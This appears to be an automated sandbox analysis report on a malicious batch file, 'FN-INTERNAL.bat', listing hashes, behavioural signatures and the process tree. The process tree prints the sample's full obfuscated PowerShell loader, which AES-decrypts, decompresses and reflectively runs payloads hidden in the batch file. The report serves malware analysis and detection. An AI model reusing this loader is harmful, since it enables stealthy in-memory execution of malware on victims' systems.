Analysis
-
max time kernel
1561s -
max time network
1562s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
26-05-2024 14:55
Static task
static1
Behavioral task
behavioral1
Sample
FN-INTERNAL.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
FN-INTERNAL.bat
Resource
win7-20240508-en
Behavioral task
behavioral3
Sample
FN-INTERNAL.bat
Resource
win10v2004-20240508-en
General
-
Target
FN-INTERNAL.bat
-
Size
376KB
-
MD5
121a69448e9f5eef0ba4c1229b471208
-
SHA1
90abf42b20fb75a7f922b4a83cbeb77ca5dbf5d0
-
SHA256
b383a0ab3670e505ae0b7a7b6d68c096bb799ce858d8afc2e2ef5d1c1314051a
-
SHA512
c9e903245c3ab434018e23e4c51bf9d4fcbdb9dc1b85114574c12a2ce5c3ec6cd811fa1b51a34c86c695c6ba79cade1cdc215c4953090a342ba4ff6c1a92bc3d
-
SSDEEP
6144:C+g8ai0m+BiS0FY9tRpUOAIeJxsOjzW1JlW5nHa5EV8hpzjHRQbh9xph9aK7PGaj:C+gdOSOYbRHjeJxbOJlW5niJSdT9amGk
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1196 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1196 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exedescription pid process target process PID 1284 wrote to memory of 1148 1284 cmd.exe cmd.exe PID 1284 wrote to memory of 1148 1284 cmd.exe cmd.exe PID 1284 wrote to memory of 1148 1284 cmd.exe cmd.exe PID 1284 wrote to memory of 1144 1284 cmd.exe cmd.exe PID 1284 wrote to memory of 1144 1284 cmd.exe cmd.exe PID 1284 wrote to memory of 1144 1284 cmd.exe cmd.exe PID 1284 wrote to memory of 1196 1284 cmd.exe powershell.exe PID 1284 wrote to memory of 1196 1284 cmd.exe powershell.exe PID 1284 wrote to memory of 1196 1284 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵PID:1148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97S5HKOOEHVTK1tx3yu5lTndq7VoLhaiBMi1fQ7XC/w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BY/5WS5SKbagLrml3T2b0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ERsLU=New-Object System.IO.MemoryStream(,$param_var); $BcZuZ=New-Object System.IO.MemoryStream; $aYIjw=New-Object System.IO.Compression.GZipStream($ERsLU, [IO.Compression.CompressionMode]::Decompress); $aYIjw.CopyTo($BcZuZ); $aYIjw.Dispose(); $ERsLU.Dispose(); $BcZuZ.Dispose(); $BcZuZ.ToArray();}function execute_function($param_var,$param2_var){ $WzoGX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXAck=$WzoGX.EntryPoint; $uXAck.Invoke($null, $param2_var);}$FVRVU = 'C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat';$host.UI.RawUI.WindowTitle = $FVRVU;$gLqRi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FVRVU).Split([Environment]::NewLine);foreach ($pQPCS in $gLqRi) { if ($pQPCS.StartsWith('VPEeCHQfOWHyYXzmlFZZ')) { $YmBxU=$pQPCS.Substring(20); break; }}$payloads_var=[string[]]$YmBxU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:1144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196
-